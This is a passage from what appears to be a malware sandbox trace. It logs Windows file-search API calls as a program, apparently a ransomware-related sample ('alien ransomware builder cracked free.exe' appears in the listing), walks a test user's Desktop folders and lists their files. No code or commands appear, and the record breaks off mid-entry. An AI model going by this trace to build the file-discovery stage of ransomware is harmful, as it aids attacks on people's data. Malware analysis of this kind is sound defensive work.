nFileSizeHigh=0x0, nFileSizeLow=0xb4eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="E2jRFWUv.xlsx", cAlternateFileName="E2JRFW~1.XLS")) returned 1 [0063.314] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9298a40, ftCreationTime.dwHighDateTime=0x1d5cdc4, ftLastAccessTime.dwLowDateTime=0xb615c9a0, ftLastAccessTime.dwHighDateTime=0x1d5d360, ftLastWriteTime.dwLowDateTime=0xb615c9a0, ftLastWriteTime.dwHighDateTime=0x1d5d360, nFileSizeHigh=0x0, nFileSizeLow=0x68aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="krWg9z-VUaci.wav", cAlternateFileName="KRWG9Z~1.WAV")) returned 1 [0063.315] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5714a10, ftCreationTime.dwHighDateTime=0x1d5d59b, ftLastAccessTime.dwLowDateTime=0xafa97800, ftLastAccessTime.dwHighDateTime=0x1d5d2cf, ftLastWriteTime.dwLowDateTime=0xafa97800, ftLastWriteTime.dwHighDateTime=0x1d5d2cf, nFileSizeHigh=0x0, nFileSizeLow=0x10b8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="KsPC3.bmp", cAlternateFileName="")) returned 1 [0063.315] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0240, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0x626ed2a0, ftLastAccessTime.dwHighDateTime=0x1d5ccb3, ftLastWriteTime.dwLowDateTime=0x626ed2a0, ftLastWriteTime.dwHighDateTime=0x1d5ccb3, nFileSizeHigh=0x0, nFileSizeLow=0xad34, dwReserved0=0x0, dwReserved1=0x0, cFileName="kZHWiDNy.mp4", cAlternateFileName="")) returned 1 [0063.315] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2d402a0, ftCreationTime.dwHighDateTime=0x1d5d269, ftLastAccessTime.dwLowDateTime=0x6cdeacf0, ftLastAccessTime.dwHighDateTime=0x1d5d1eb, ftLastWriteTime.dwLowDateTime=0x6cdeacf0, ftLastWriteTime.dwHighDateTime=0x1d5d1eb, nFileSizeHigh=0x0, nFileSizeLow=0xad19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oo6K.m4a", cAlternateFileName="")) returned 1 [0063.315] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0063.315] FindNextFileW (in: hFindFile=0x9bf2c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0063.315] FindClose (in: hFindFile=0x9bf2c0 | out: hFindFile=0x9bf2c0) returned 1 [0063.315] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.jpeg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.316] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf020 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde6efb0, ftCreationTime.dwHighDateTime=0x1d5ca5f, ftLastAccessTime.dwLowDateTime=0x662319e0, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x662319e0, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x16745, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png", cAlternateFileName="DN0HVZ~1.PNG")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1afa9ca0, ftCreationTime.dwHighDateTime=0x1d5d768, ftLastAccessTime.dwLowDateTime=0x9e894010, ftLastAccessTime.dwHighDateTime=0x1d5d5cb, ftLastWriteTime.dwLowDateTime=0x9e894010, ftLastWriteTime.dwHighDateTime=0x1d5d5cb, nFileSizeHigh=0x0, nFileSizeLow=0xa84f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png", cAlternateFileName="")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5061a0, ftCreationTime.dwHighDateTime=0x1d5cd77, ftLastAccessTime.dwLowDateTime=0xf08f0a70, ftLastAccessTime.dwHighDateTime=0x1d5cd33, ftLastWriteTime.dwLowDateTime=0xf08f0a70, ftLastWriteTime.dwHighDateTime=0x1d5cd33, nFileSizeHigh=0x0, nFileSizeLow=0x2338, dwReserved0=0x0, dwReserved1=0x0, cFileName="luPvkk7BP6.m4a", cAlternateFileName="LUPVKK~1.M4A")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 1 [0063.316] FindNextFileW (in: hFindFile=0x9bf020, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e65510, ftCreationTime.dwHighDateTime=0x1d5d6ee, ftLastAccessTime.dwLowDateTime=0x811c8ad0, ftLastAccessTime.dwHighDateTime=0x1d5cd8a, ftLastWriteTime.dwLowDateTime=0x811c8ad0, ftLastWriteTime.dwHighDateTime=0x1d5cd8a, nFileSizeHigh=0x0, nFileSizeLow=0x17e9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="P-7IEYH2CNc0UByn.m4a", cAlternateFileName="P-7IEY~1.M4A")) returned 0 [0063.317] FindClose (in: hFindFile=0x9bf020 | out: hFindFile=0x9bf020) returned 1 [0063.317] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.jpeg", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0063.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0063.317] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0063.317] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0063.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0063.317] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0063.317] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.317] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.gif", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c346c0, ftCreationTime.dwHighDateTime=0x1d5c79c, ftLastAccessTime.dwLowDateTime=0xc13b08a0, ftLastAccessTime.dwHighDateTime=0x1d5d463, ftLastWriteTime.dwLowDateTime=0xc13b08a0, ftLastWriteTime.dwHighDateTime=0x1d5d463, nFileSizeHigh=0x0, nFileSizeLow=0x4b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif", cAlternateFileName="")) returned 0x9bf320 [0063.317] FindClose (in: hFindFile=0x9bf320 | out: hFindFile=0x9bf320) returned 1 [0063.317] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bf200 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c346c0, ftCreationTime.dwHighDateTime=0x1d5c79c, ftLastAccessTime.dwLowDateTime=0xc13b08a0, ftLastAccessTime.dwHighDateTime=0x1d5d463, ftLastWriteTime.dwLowDateTime=0xc13b08a0, ftLastWriteTime.dwHighDateTime=0x1d5d463, nFileSizeHigh=0x0, nFileSizeLow=0x4b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif", cAlternateFileName="")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0063.318] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2942aad0, ftCreationTime.dwHighDateTime=0x1d5d5cb, ftLastAccessTime.dwLowDateTime=0x3520ea30, ftLastAccessTime.dwHighDateTime=0x1d5d358, ftLastWriteTime.dwLowDateTime=0x3520ea30, ftLastWriteTime.dwHighDateTime=0x1d5d358, nFileSizeHigh=0x0, nFileSizeLow=0x10253, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif", cAlternateFileName="J51YJL~1.GIF")) returned 1 [0063.319] FindNextFileW (in: hFindFile=0x9bf200, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, 